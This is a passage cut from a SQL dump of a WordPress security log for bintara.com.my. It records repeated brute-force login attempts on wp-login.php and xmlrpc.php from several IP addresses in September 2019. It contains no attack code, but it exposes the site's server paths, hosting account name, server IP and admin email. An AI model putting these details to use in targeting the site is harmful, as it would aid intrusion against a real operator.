04:25:54',18255792,19552736,'https://bintara.com.my/xmlrpc.php',1,0,'213.122.172.69'),(24391,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"104.236.127.247\";s:11:\"REMOTE_PORT\";s:5:\"34117\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBhWdVIJ66zPtjtaf3-zAAAAUY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568694617.1813\";s:12:\"REQUEST_TIME\";s:10:\"1568694617\";}}','notice','2019-09-17 04:30:18','2019-09-17 04:30:17',17739704,19228936,'https://bintara.com.my/wp-login.php',1,0,'104.236.127.247'),(24392,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"104.236.127.247\";s:11:\"REMOTE_PORT\";s:5:\"35219\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBhXA99C9j9bhK9KplGlwAAAQ0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568694625.6661\";s:12:\"REQUEST_TIME\";s:10:\"1568694625\";}}','notice','2019-09-17 04:30:27','2019-09-17 04:30:26',18255424,19555152,'https://bintara.com.my/xmlrpc.php',1,0,'104.236.127.247'),(24393,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"144.217.161.22\";s:11:\"REMOTE_PORT\";s:5:\"56792\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBjPR@uZ4OC5N1Fn8FBCQAAAJg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568695101.6452\";s:12:\"REQUEST_TIME\";s:10:\"1568695101\";}}','notice','2019-09-17 04:38:22','2019-09-17 04:38:21',17739408,19229424,'https://bintara.com.my/wp-login.php',1,0,'144.217.161.22'),(24394,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"144.217.161.22\";s:11:\"REMOTE_PORT\";s:5:\"58126\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBjQNVIJ66zPtjtaf0BNwAAAUI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568695105.0053\";s:12:\"REQUEST_TIME\";s:10:\"1568695105\";}}','notice','2019-09-17 04:38:26','2019-09-17 04:38:25',18255792,19552736,'https://bintara.com.my/xmlrpc.php',1,0,'144.217.161.22'),(24395,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"167.114.118.135\";s:11:\"REMOTE_PORT\";s:5:\"39934\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBm6NVIJ66zPtjtaf0EFQAAAU8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568696040.2447\";s:12:\"REQUEST_TIME\";s:10:\"1568696040\";}}','notice','2019-09-17 04:54:01','2019-09-17 04:54:00',17740120,19230352,'https://bintara.com.my/wp-login.php',1,0,'167.114.118.135'),(24396,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"167.114.118.135\";s:11:\"REMOTE_PORT\";s:5:\"41480\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBm69K-omY048@iBsMtUgAAAME\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568696043.6277\";s:12:\"REQUEST_TIME\";s:10:\"1568696043\";}}','notice','2019-09-17 04:54:04','2019-09-17 04:54:03',18256408,19555304,'https://bintara.com.my/xmlrpc.php',1,0,'167.114.118.135'),(24397,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"78.47.68.84\";s:11:\"REMOTE_PORT\";s:5:\"51747\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBon9VIJ66zPtjtaf0FCQAAAUs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568696479.3347\";s:12:\"REQUEST_TIME\";s:10:\"1568696479\";}}','notice','2019-09-17 05:01:20','2019-09-17 05:01:19',17740120,19229664,'https://bintara.com.my/wp-login.php',1,0,'78.47.68.84'),(24398,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"78.47.68.84\";s:11:\"REMOTE_PORT\";s:5:\"52129\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBootVIJ66zPtjtaf0FDAAAAU0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568696482.194\";s:12:\"REQUEST_TIME\";s:10:\"1568696482\";}}','notice','2019-09-17 05:01:23','2019-09-17 05:01:22',18255936,19554320,'https://bintara.com.my/xmlrpc.php',1,0,'78.47.68.84'),(24399,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"188.213.19.83\";s:11:\"REMOTE_PORT\";s:5:\"42452\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBovNVIJ66zPtjtaf0FMwAAAVM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568696508.9325\";s:12:\"REQUEST_TIME\";s:10:\"1568696508\";}}','notice','2019-09-17 05:01:50','2019-09-17 